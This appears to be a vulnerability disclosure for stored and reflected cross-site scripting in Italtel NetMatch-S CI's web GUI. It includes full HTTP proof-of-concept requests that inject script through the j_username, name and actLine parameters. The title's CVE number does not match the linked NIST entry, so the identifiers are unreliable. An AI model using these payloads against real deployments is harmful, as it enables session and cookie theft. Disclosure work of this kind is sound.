CVE-2019-19453: Vulnerability Research & Advisor

Vulnerability Description: Multiple Cross Site Scripting Reflected/Stored- CWE-79

Software Version: 5.2.0-20211008

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39813

CVSv3: 6,1

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be triggered every time an authenticated user browses the page containing it.

Step-by-step instructions and PoC.

The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by both the stored and reflected type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed both pre and post authentication.

Affected Endpoints

· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec

o HTTP POST Parameter: j_username

· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp

o HTTP POST Parameter: name, actLine

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec

Payload used to exploit the vulnerability:

POST /[NODE-NAME]/NMSCI-WebGui/j_security_check HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=test.csv;%3Cimg+src
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

j_username=<img+src=x+onerror=alert(document.cookie)+>&j_password=%27

The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value in the “j_username” POST parameter with the javascript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alerts generate a notification on the home page, the javascript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical, since the attacker does not need any kind of access to the web application in order to exploit it.

URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp

Payload used to exploit the vulnerability:

POST /[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp HTTP/1.1
Host: [HOST] Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q= 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 608
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=today.csv
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

name=today.csv&actLine=”</script><img src=x onerror=”alert(1)”>

The endpoint is affected by the Reflected type of this vulnerability. The first step consists of replacing the value in the “actLine” POST parameter with the javascript code to modify the content of the HTML response page, the content of the parameter is printed without any checks being made. The same behavior is present also for the name parameter. This endpoint is exploitable by any authenticated user that is able to view the application logs.